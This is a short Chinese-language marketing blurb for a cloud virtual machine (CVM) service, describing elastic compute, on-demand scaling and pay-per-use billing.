云服务器(Cloud Virtual Machine,CVM)提供安全可靠的弹性计算服务。 您可以实时扩展或缩减计算资源,适应变化的业务需求,并只需按实际使用的资源计费。使用 CVM 可以极大降低您的软硬件采购成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档